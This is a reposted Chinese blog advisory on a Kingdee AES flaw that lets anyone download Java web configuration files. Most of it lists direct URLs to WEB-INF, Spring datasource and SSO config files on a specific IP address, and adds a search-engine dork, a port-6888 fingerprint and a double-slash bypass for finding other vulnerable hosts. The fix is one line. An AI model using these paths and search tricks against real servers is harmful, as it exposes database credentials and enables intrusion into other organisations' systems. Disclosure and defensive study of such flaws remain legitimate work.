java导致敏感信息泄漏的异常_金蝶AES系统Java web配置文件敏感信息泄露漏洞

最新推荐文章于 2024-05-21 16:07:01 发布
最新推荐文章于 2024-05-21 16:07:01 发布
阅读量862 收藏
点赞数
文章标签: java导致敏感信息泄漏的异常
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42123296/article/details/115104936
版权
本文介绍了金蝶AES系统存在的一个安全问题,允许攻击者任意下载Java Web配置文件,包括portal和eassso目录下的多个XML配置,可能导致敏感信息泄漏。修复方案是阻止通过Web访问这些配置文件。
摘要由CSDN通过智能技术生成

### 0x01 漏洞框架

金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用

官方主页:www.kingdee.com

客户案例:

![](https://images.seebug.org/contribute/f1e376de-178e-4d65-9ead-427b68e088c0)

### 0x02 漏洞利用

金蝶AES系统Java web配置文件可任意下载。

portal下的配置文件:

http://58.63.253.42/portal/WEB-INF/web.xml

http://58.63.253.42/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-basic.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-datasource.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-frame.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-pub.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-perm.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-setting.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-page.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-personal.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-portlet.xml

http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-weibo.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-report.xml

http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-sms.xml

http://58.63.253.42/portal/WEB-INF/sso/applicationContext-ssoClient.xml

eassso下的配置文件:

检索关键字: inurl:/eassso/

可以找到了同类系统,以下地址手工验证存在漏洞(该系统较多监听6888端口,可以根据这个特征定位),若一个斜杠下载不成功,可尝试加双斜杠:

http://58.63.253.42/eassso//WEB-INF/web.xml

http://58.63.253.42/eassso//WEB-INF/applicationContext.xml

http://58.63.253.42/easssoWEB-INF/deployerConfigContext.xml

读取数据源配置 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-datasource.xml, 得到:

```

```

### 0x03 修复方案

禁止通过web访问

loading-bars.svg

蓝星神
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 574
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1144
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
J2EE中关于web.xml文件的配置
12-18
J2EE中关于web.xml文件的配置
金蝶EASEAS Cloud远程代码执行漏洞
hackzkaq的博客
10-13 754
金蝶 EASEAS Cloud 存在远程代码执行漏洞
【成功复现】金蝶云星空反序列化远程代码执行漏洞
最新发布
weixin_57514792的博客
05-21 1286
【成功复现】金蝶云星空反序列化远程代码执行漏洞
金蝶-EAS easWebClient 任意文件读取漏洞复现
02-20 1589
金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。
漏洞复现】金蝶EASEAS Cloud远程代码执行漏洞
2301_80127209的博客
04-03 566
金蝶 EASEAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
AES.rar_AES_AES加密 java_AES加密解密_aes java_java aes
09-24
资源包中的`AES.java`文件可能包含了上述步骤的完整示例代码,可以帮助开发者快速理解和实现AES加密解密功能。在使用时,务必注意密钥管理,避免密钥泄露导致数据安全问题。同时,对称加密虽然效率高,但在大量用户...
jsj_6_3.rar_Java web登陆_web java 学生_简单 系统
09-21
在本项目"jsj_6_3.rar"中,我们探讨的是一个基于Java Web的学生管理系统,该系统提供了基本的登录和注册功能。这个系统对于学习Java Web开发的初学者来说是一个很好的实践案例,因为它涵盖了Web应用程序开发的核心...
2007419349385.rar_java 毕业设计_property java_物业管理_物业管理 信息 系统_物业管理 系
07-13
Java物业管理信息系统毕业设计详解》 Java作为一款广泛应用于企业级开发的语言,其在物业管理系统的开发中也扮演了重要角色。本毕业设计项目——“物业管理信息管理系统”旨在为物业管理人员提供一套高效、便捷的...
敏感文件泄露脚本_quite8ev_扫描网站目录_敏感文件泄漏脚本_网站渗透测试_almostsod_
10-04
可以扫描网站目录中的敏感文件 对目标网站进行敏感信息泄露的渗透测试
AES代码_java版本.rar_AES_BackAES_aes java_aesutils java_lifebza
09-24
在给定的"AES代码_java版本.rar"压缩包中,包含了与AES加密相关的Java实现,包括可能的BackAES(可能是一个自定义实现或后向兼容的AES类)、AESJavaAESUtilsJava等组件,以及一个名为TestAes的测试文件,用于验证...
【复现】金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 1421
【复现】金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。
javabean使用@Data注解会泄露敏感信息
weixin_42299862的博客
03-28 739
Lonmbok是个轮子,可以减少一些 get/set/toString 方法的编写,消除代码的冗长。在实体类上引入@Date就可以自动生成类所有属性的 get 和 set 方法,此外还提供了equals、canEqual、hashCode、toString 方法。 javabean里面,使用@Data 注解时,如果遇到敏感参数,应该加注解@ToString.Exclude过滤敏感信息,否则会将敏感...
漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞
qq_67810151的博客
04-03 268
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
0Day!!通杀未公开漏洞-金蝶EAS plt_portal接口存在任意文件上传-大量资产
weixin_43167326的博客
03-19 731
金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。
金蝶协同办公平台任意文件下载漏洞(无需登录)
weixin_50464560的博客
08-30 3095
直接访问即可下载该文件了,保存的文件名为:file.txt。很明显的任意文件下载漏洞,随便在网上找一个实例进行证明。经测试发现,该系统存在任意文件下载,且无需登录。
金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)
0xSec
12-22 2570
由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值